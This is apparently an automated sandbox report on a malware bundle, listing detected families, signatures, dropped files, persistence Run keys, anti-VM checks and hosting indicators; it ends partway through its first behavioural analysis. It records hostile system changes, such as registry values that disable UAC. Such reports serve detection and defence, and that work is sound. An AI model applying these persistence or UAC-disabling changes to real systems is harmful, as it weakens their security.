Malware Analysis Report

2025-01-22 20:39

Sample ID 241212-wy4dxsvkcp
Target Downloaders.zip
SHA256 16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267
Tags
amadey asyncrat gh0strat gurcu hive lockbit lumma meduza phorphiex quasar redline vidar xworm 14082024 4bee07 a21440e9f7223be06be5f5e2f94969c7 default newbundle2 office04 runtimebroker svhost collection credential_access defense_evasion discovery evasion execution infostealer loader persistence phishing privilege_escalation pyinstaller ransomware rat spyware stealer trojan upx worm 44caliber discordrat rms stealc umbral qqtalk2 voov1 voov3 rootkit qqtalk qqtalk1 voov voov2 azorult remcos xmrig tg@cvv88888 miner vmprotect
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267

Threat Level: Known bad

The file Downloaders.zip was found to be: Known bad.

Malicious Activity Summary

amadey asyncrat gh0strat gurcu hive lockbit lumma meduza phorphiex quasar redline vidar xworm 14082024 4bee07 a21440e9f7223be06be5f5e2f94969c7 default newbundle2 office04 runtimebroker svhost collection credential_access defense_evasion discovery evasion execution infostealer loader persistence phishing privilege_escalation pyinstaller ransomware rat spyware stealer trojan upx worm 44caliber discordrat rms stealc umbral qqtalk2 voov1 voov3 rootkit qqtalk qqtalk1 voov voov2 azorult remcos xmrig tg@cvv88888 miner vmprotect

Gurcu, WhiteSnake

Redline family

Gurcu family

RMS

Stealc family

Suspicious use of NtCreateUserProcessOtherParentProcess

Amadey

Stealc

Remcos family

RedLine

Quasar RAT

Discord RAT

44Caliber family

Xworm

Quasar payload

Detect Umbral payload

Gh0st RAT payload

Remcos

Xworm family

Umbral family

Lumma Stealer, LummaC

xmrig

Quasar family

RedLine payload

Gh0strat family

Lockbit family

Umbral

Rule to detect Lockbit 3.0 ransomware Windows payload

Asyncrat family

AsyncRat

Detects Go variant of Hive Ransomware

Azorult

44Caliber

Xmrig family

Lockbit

Lumma family

UAC bypass

Amadey family

Detect Xworm Payload

Meduza

Rms family

Vidar family

Hive

Discordrat family

Meduza Stealer payload

Hive family

Vidar

Phorphiex family

Phorphiex payload

Meduza family

Phorphiex, Phorpiex

Gh0strat

Suspicious use of NtCreateProcessExOtherParentProcess

Detect Vidar Stealer

Azorult family

Detected Nirsoft tools

Enumerates VirtualBox registry keys

XMRig Miner payload

Async RAT payload

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Stops running service(s)

Uses browser remote debugging

Downloads MZ/PE file

Command and Scripting Interpreter: PowerShell

Command and Scripting Interpreter: PowerShell

Drops file in Drivers directory

Adds policy Run key to start application

Modifies Windows Firewall

Command and Scripting Interpreter: PowerShell

Sets file to hidden

VMProtect packed file

A potential corporate email address has been identified in the URL: 3SCET_Admin@OFGADUSE_report.wsr

Reads data files stored by FTP clients

Checks computer location settings

Reads user/profile data of web browsers

Indicator Removal: Clear Windows Event Logs

Identifies Wine through registry keys

A potential corporate email address has been identified in the URL: oDRAV_Admin@OFGADUSE_report.wsr

A potential corporate email address has been identified in the URL: vtXV0_Admin@YQRLKYON_report.wsr

Checks BIOS information in registry

Loads dropped DLL

Clipboard Data

Drops startup file

Unsecured Credentials: Credentials In Files

A potential corporate email address has been identified in the URL: naAjO_Admin@OFGADUSE_report.wsr

Reads WinSCP keys stored on the system

Executes dropped EXE

Accesses cryptocurrency files/wallets, possible credential harvesting

Looks up external IP address via web service

Accesses Microsoft Outlook profiles

Power Settings

Indicator Removal: File Deletion

Enumerates connected drives

Adds Run key to start application

Checks installed software on the system

Legitimate hosting services abused for malware hosting/C2

Drops desktop.ini file(s)

Obfuscated Files or Information: Command Obfuscation

Network Service Discovery

Blocklisted process makes network request

Suspicious use of SetThreadContext

Drops file in System32 directory

Suspicious use of NtSetInformationThreadHideFromDebugger

Enumerates processes with tasklist

UPX packed file

AutoIT Executable

Launches sc.exe

Drops file in Program Files directory

Drops file in Windows directory

Event Triggered Execution: Installer Packages

Access Token Manipulation: Create Process with Token

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Unsigned PE

System Network Configuration Discovery: Internet Connection Discovery

System Network Configuration Discovery: Wi-Fi Discovery

Browser Information Discovery

Program crash

Detects Pyinstaller

Event Triggered Execution: Netsh Helper DLL

Uses Volume Shadow Copy service COM API

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

Views/modifies file attributes

outlook_win_path

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Modifies Internet Explorer settings

outlook_office_path

Suspicious use of AdjustPrivilegeToken

Uses Task Scheduler COM API

Suspicious use of FindShellTrayWindow

Modifies system certificate store

Runs ping.exe

Modifies registry key

Gathers system information

Modifies registry class

Checks processor information in registry

Checks SCSI registry key(s)

Suspicious behavior: GetForegroundWindowSpam

Suspicious use of SetWindowsHookEx

Suspicious behavior: AddClipboardFormatListener

Scheduled Task/Job: Scheduled Task

Delays execution with timeout.exe

Suspicious use of SendNotifyMessage

Kills process with taskkill

GoLang User-Agent

Runs .reg file with regedit

Suspicious behavior: MapViewOfSection

Detects videocard installed

Suspicious use of WriteProcessMemory

Enumerates system info in registry

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2024-12-12 18:20

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-12-12 18:20

Reported

2024-12-12 18:25

Platform

win10v2004-20241007-en

Max time kernel

130s

Max time network

301s

Command Line

sihost.exe

Signatures

Amadey

trojan amadey

Amadey family

amadey

AsyncRat

rat asyncrat

Asyncrat family

asyncrat

Detect Vidar Stealer

stealer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Detects Go variant of Hive Ransomware

Description Indicator Process Target
N/A N/A N/A N/A

Gh0st RAT payload

Description Indicator Process Target
N/A N/A N/A N/A

Gh0strat

rat gh0strat

Gh0strat family

gh0strat

Gurcu family

gurcu

Gurcu, WhiteSnake

stealer gurcu

Hive

ransomware hive

Hive family

hive

Lockbit

ransomware lockbit

Lockbit family

lockbit

Lumma Stealer, LummaC

stealer lumma

Lumma family

lumma

Meduza

stealer meduza

Meduza Stealer payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Meduza family

meduza

Phorphiex family

phorphiex

Phorphiex payload

Description Indicator Process Target
N/A N/A N/A N/A

Phorphiex, Phorpiex

worm trojan loader phorphiex

Quasar RAT

trojan spyware quasar

Quasar family

quasar

Quasar payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

Rule to detect Lockbit 3.0 ransomware Windows payload

Description Indicator Process Target
N/A N/A N/A N/A

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\PromptOnSecureDesktop = "0" C:\Windows\system32\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" C:\Windows\system32\reg.exe N/A

Vidar

stealer vidar

Vidar family

vidar

Xworm

trojan rat xworm

Xworm family

xworm

Async RAT payload

rat
Description Indicator Process Target
N/A N/A N/A N/A

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\Files\random.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\Files\ama.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\netsh.exe N/A

Sets file to hidden

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\attrib.exe N/A

A potential corporate email address has been identified in the URL: vtXV0_Admin@YQRLKYON_report.wsr

phishing

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\Files\random.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\Files\random.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\Files\ama.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\Files\ama.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Files\Amadey.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Files\kohjaekdfth.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Files\av_downloader1.1.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\4363463463464363463463463.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Files\chrome11.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1989129625.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Windows\system32\mshta.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Windows\system32\devtun\RuntimeBroker.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Files\boleto.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Windows\system32\devtun\RuntimeBroker.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Windows\system32\devtun\RuntimeBroker.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Files\Offnewhere.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Files\ama.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\Files\AV_DOW~1.EXE N/A

Drops startup file

Description Indicator Process Target
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ectosphere.vbs C:\Users\Admin\AppData\Local\snails\ectosphere.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\frameApp_consoleMode.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\frameApp_consoleMode.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Powershell.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System.lnk C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\Registry.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\SubDir\Runtime Broker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\chrome11.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\award.pdf.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\test14.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\pp.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\305iz8bs.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2910514938.exe N/A
N/A N/A C:\Windows\sysnldcvmr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\Amadeus.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1989129625.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\2309417675.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\build555.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\Complexo%20v4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\FDR9876567000.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\Neverlose%20Loader.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\snails\ectosphere.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\snails\ectosphere.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\262965725.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\steel.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\is-2M6HH.tmp\steel.tmp N/A
N/A N/A C:\Users\Admin\AppData\Local\Video Minimizer 1.77\videominimizer32.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\ControlledAccessPoint.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\njrtdhadawt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\281730318.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\windowsexecutable.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\bqkriy6l.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\3161510603.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\test26.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\clip.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\random.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\test_again2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\14082024.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\Amadey.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\28c5e5ba36\Hkbsse.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\System.exe N/A
N/A N/A C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\Setup2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\gweadtrgh.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\RuntimeBroker.exe N/A
N/A N/A C:\Windows\system32\devtun\RuntimeBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\AutoUpdate.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\Offnewhere.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\Hive%20Ransomware.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\svhost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\boleto.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svhost\svhost.exe N/A
N/A N/A C:\Windows\system32\devtun\RuntimeBroker.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\ama.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\zeropersca.exe N/A
N/A N/A C:\Users\Admin\Microsoft Windows Security\winupsecvmgr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\builder.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\kohjaekdfth.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\popapoers.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\av_downloader1.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\tdrpload.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\4434.exe N/A

Identifies Wine through registry keys

evasion
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\Files\ama.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Wine C:\Users\Admin\AppData\Local\Temp\Files\random.exe N/A

Reads WinSCP keys stored on the system

spyware stealer

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\19.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\14.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\17.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\18.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\Software\Microsoft\Office\20.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Local\Temp\Files\bnkrigkawd.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Windows Settings = "C:\\Windows\\sysnldcvmr.exe" C:\Users\Admin\AppData\Local\Temp\2910514938.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-4050598569-1597076380-177084960-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System = "C:\\Users\\Admin\\AppData\\Roaming\\System.exe" C:\Users\Admin\AppData\Local\Temp\Files\XClient.exe N/A

Checks installed software on the system

discovery

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\desktop.ini C:\Users\Admin\AppData\Local\Temp\Files\svchost.exe N/A

Indicator Removal: File Deletion

defense_evasion

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A 0.tcp.eu.ngrok.io N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A api.ipify.org N/A N/A
N/A api.ipify.org N/A N/A
N/A ip-api.com N/A N/A

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\devtun\RuntimeBroker.exe C:\Users\Admin\AppData\Local\Temp\Files\RuntimeBroker.exe N/A
File opened for modification C:\Windows\system32\devtun\RuntimeBroker.exe C:\Users\Admin\AppData\Local\Temp\Files\RuntimeBroker.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\random.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Files\ama.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\Application\chrome.exe C:\Users\Admin\AppData\Local\Temp\Files\chrome11.exe N/A
File opened for modification C:\Program Files\Google\Chrome\Application\chrome.exe C:\Users\Admin\AppData\Local\Temp\Files\chrome11.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\sysnldcvmr.exe C:\Users\Admin\AppData\Local\Temp\2910514938.exe N/A
File opened for modification C:\Windows\sysnldcvmr.exe C:\Users\Admin\AppData\Local\Temp\2910514938.exe N/A
File created C:\Windows\Tasks\Hkbsse.job C:\Users\Admin\AppData\Local\Temp\Files\Amadey.exe N/A
File created C:\Windows\Tasks\Gxtuum.job C:\Users\Admin\AppData\Local\Temp\Files\Offnewhere.exe N/A
File created C:\Windows\Tasks\defnur.job C:\Users\Admin\AppData\Local\Temp\Files\ama.exe N/A

Access Token Manipulation: Create Process with Token

defense_evasion privilege_escalation
Description Indicator Process Target
N/A N/A C:\Windows\system32\mshta.exe N/A

Browser Information Discovery

discovery

Detects Pyinstaller

pyinstaller
Description Indicator Process Target
N/A N/A N/A N/A

Enumerates physical storage devices

Event Triggered Execution: Netsh Helper DLL

persistence privilege_escalation
Description Indicator Process Target
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key queried \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\NetSh C:\Windows\SysWOW64\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key value enumerated \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A
Key opened \REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh C:\Windows\system32\netsh.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\Offnewhere.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\fc9e0aaab7\defnur.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\2309417675.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\snails\ectosphere.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\281730318.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\23a0892ef8\Gxtuum.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\fontdrvhost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\Amadey.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\steel.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\is-2M6HH.tmp\steel.tmp N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\timeout.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\FDR9876567000.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\Files\Server1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
